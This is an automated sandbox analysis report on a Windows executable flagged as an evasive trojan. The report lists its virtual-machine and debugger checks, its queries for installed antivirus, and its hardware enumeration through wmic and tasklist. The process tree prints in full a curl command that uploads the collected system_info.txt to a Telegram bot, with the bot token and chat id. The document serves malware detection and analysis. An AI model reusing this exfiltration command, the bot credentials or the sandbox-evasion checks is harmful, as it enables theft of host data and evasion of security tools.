Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
9KEZfGRjyK.exe

Overview

General Information

Sample name:9KEZfGRjyK.exe
renamed because original name is a hash value
Original sample name:73b0e64dcc0df2f2ac4d461245021e6a.exe
Analysis ID:1578571
MD5:73b0e64dcc0df2f2ac4d461245021e6a
SHA1:ff75ef00e33fb953964d6bbe1d86d5ad8bb8c9ba
SHA256:99a4d0ac34848d665529220a0a04edd2753aba9ffe8434286967875d05643400
Tags:exeuser-meanjellybeanx
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Contain functionality to detect virtual machines
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Writes or reads registry keys via WMI
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

  • System is w10x64
  • 9KEZfGRjyK.exe (PID: 7532 cmdline: "C:\Users\user\Desktop\9KEZfGRjyK.exe" MD5: 73B0E64DCC0DF2F2AC4D461245021E6A)
    • WMIC.exe (PID: 7548 cmdline: "wmic" bios get serialnumber MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7612 cmdline: "wmic" baseboard get serialnumber MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7676 cmdline: "wmic" cpu get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7748 cmdline: "wmic" computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7836 cmdline: "wmic" diskdrive get model,size MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7900 cmdline: "wmic" /namespace:\\root\SecurityCenter2 path AntivirusProduct get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • getmac.exe (PID: 7964 cmdline: "getmac" MD5: 7D4B72DFF5B8E98DD1351A401E402C33)
      • conhost.exe (PID: 7972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • conhost.exe (PID: 7992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • systeminfo.exe (PID: 8080 cmdline: "systeminfo" MD5: EE309A9C61511E907D87B10EF226FDCD)
      • conhost.exe (PID: 8088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 8164 cmdline: "tasklist" /m sbiedll.dll MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 7296 cmdline: "tasklist" /m dbghelp.dll MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 7288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 1188 cmdline: "tasklist" /m api_log.dll MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 1608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 1804 cmdline: "tasklist" /m dir_watch.dll MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 2256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 7204 cmdline: "tasklist" /m pstorec.dll MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 4592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 4180 cmdline: "tasklist" /m vmcheck.dll MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 4600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 7568 cmdline: "tasklist" /m wpespy.dll MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 7608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7556 cmdline: "wmic" computersystem get model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 7620 cmdline: "tasklist" /fi "IMAGENAME eq vmtoolsd.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 7692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 7712 cmdline: "tasklist" /fi "IMAGENAME eq vboxservice.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 7772 cmdline: "tasklist" /fi "IMAGENAME eq vboxtray.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 7764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7868 cmdline: "wmic" csproduct get identifyingnumber MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 7864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • curl.exe (PID: 5780 cmdline: "curl" -k -F chat_id=-4193710271 -F document=@system_info.txt;filename=528110-4174-1.log https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocument MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • conhost.exe (PID: 2476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\wbem\WMIC.exe, SourceProcessId: 7556, StartAddress: 213032B0, TargetImage: C:\Windows\System32\conhost.exe, TargetProcessId: 7556

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Machine Learning detection for sample
Source: 9KEZfGRjyK.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7B901CBF0 BCryptGenRandom,SystemFunction036,BCryptGenRandom,SystemFunction036,0_2_00007FF7B901CBF0
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49775 version: TLS 1.2
Source: 9KEZfGRjyK.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: data.pdb source: 9KEZfGRjyK.exe
Source: Binary string: data.pdb)444 source: 9KEZfGRjyK.exe
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7B902EB20 CloseHandle,FindFirstFileW,FindClose,0_2_00007FF7B902EB20

Networking

barindex
Uses the Telegram API (likely for C&C communication)
Source: unknownDNS query: name: api.telegram.org
Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox ViewJA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: api.telegram.org
Source: unknownHTTP traffic detected: POST /bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocument HTTP/1.1Host: api.telegram.orgUser-Agent: curl/7.83.1Accept: */*Content-Length: 3664Content-Type: multipart/form-data; boundary=------------------------cdbe2087272a7b9c
Source: curl.exe, 0000002D.00000003.2464902792.0000025DD64DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocument
Source: curl.exe, 0000002D.00000002.2465503271.0000025DD64C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocumentC:
Source: curl.exe, 0000002D.00000002.2465599836.0000025DD64DF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2464866626.0000025DD64DD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2465157934.0000025DD64DF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2464902792.0000025DD64DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocumentLC
Source: curl.exe, 0000002D.00000003.2464866626.0000025DD64DD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2465008395.0000025DD64DD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2465157934.0000025DD64DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocumentapi.telegram.
Source: 9KEZfGRjyK.exe, 00000000.00000002.2465951208.0000021FE02CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4o
Source: 9KEZfGRjyK.exe, 00000000.00000002.2465951208.0000021FE02CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4o.txt1q
Source: 9KEZfGRjyK.exe, 00000000.00000002.2465951208.0000021FE02CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/botc
Source: 9KEZfGRjyK.exe, 00000000.00000002.2465951208.0000021FE02CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/botctK.exe
Source: 9KEZfGRjyK.exeString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49775 version: TLS 1.2

System Summary

barindex
Writes or reads registry keys via WMI
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7B902F0E0 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError,0_2_00007FF7B902F0E0
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7B902F200 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,0_2_00007FF7B902F200
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7B902FDF00_2_00007FF7B902FDF0
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7B90318F00_2_00007FF7B90318F0
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7B90127200_2_00007FF7B9012720
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7B9045A900_2_00007FF7B9045A90
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7B9039AF00_2_00007FF7B9039AF0
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7B90439300_2_00007FF7B9043930
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7B9042C200_2_00007FF7B9042C20
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7B9046CA00_2_00007FF7B9046CA0
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7B901FCF00_2_00007FF7B901FCF0
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7B902BB600_2_00007FF7B902BB60
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7B904EF000_2_00007FF7B904EF00
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7B902E0600_2_00007FF7B902E060
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7B90460800_2_00007FF7B9046080
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7B903D0000_2_00007FF7B903D000
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7B90271300_2_00007FF7B9027130
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7B90411400_2_00007FF7B9041140
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7B90423B00_2_00007FF7B90423B0
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7B90375200_2_00007FF7B9037520
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7B90118100_2_00007FF7B9011810
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: String function: 00007FF7B901F4E0 appears 69 times
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: String function: 00007FF7B90453F0 appears 61 times
Source: system_info.txt.0.drBinary string: EC-F4-BB-EA-15-88 \Device\Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: system_info.txt.0.drBinary string: Boot Device: \Device\HarddiskVolume1
Source: classification engineClassification label: mal72.troj.evad.winEXE@64/2@1/2
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeCode function: 0_2_00007FF7B902F330 GetModuleHandleW,FormatMessageW,GetLastError,0_2_00007FF7B902F330
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeFile created: C:\Users\user\Desktop\system_info.txtJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7608:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8088:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1608:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7288:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8172:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2256:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7756:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7908:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7692:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7764:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2476:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4600:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7864:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7992:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4592:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7632:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7844:120:WilError_03
Source: 9KEZfGRjyK.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VMTOOLSD.EXE'
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VMTOOLSD.EXE'
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXSERVICE.EXE'
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'VBOXTRAY.EXE'
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\9KEZfGRjyK.exe "C:\Users\user\Desktop\9KEZfGRjyK.exe"
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" bios get serialnumber
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" baseboard get serialnumber
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" cpu get name
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" computersystem get totalphysicalmemory
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" diskdrive get model,size
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" /namespace:\\root\SecurityCenter2 path AntivirusProduct get displayName
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\getmac.exe "getmac"
Source: C:\Windows\System32\getmac.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\systeminfo.exe "systeminfo"
Source: C:\Windows\System32\systeminfo.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m sbiedll.dll
Source: C:\Windows\System32\tasklist.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m dbghelp.dll
Source: C:\Windows\System32\tasklist.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m api_log.dll
Source: C:\Windows\System32\tasklist.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m dir_watch.dll
Source: C:\Windows\System32\tasklist.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m pstorec.dll
Source: C:\Windows\System32\tasklist.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m vmcheck.dll
Source: C:\Windows\System32\tasklist.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /m wpespy.dll
Source: C:\Windows\System32\tasklist.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" computersystem get model
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /fi "IMAGENAME eq vmtoolsd.exe"
Source: C:\Windows\System32\tasklist.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /fi "IMAGENAME eq vboxservice.exe"
Source: C:\Users\user\Desktop\9KEZfGRjyK.exeProcess created: C:\Windows\System32\tasklist.exe "tasklist" /fi "IMAGENAME eq vboxtray.exe"
Source: C:\Windows\System32\tasklist.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
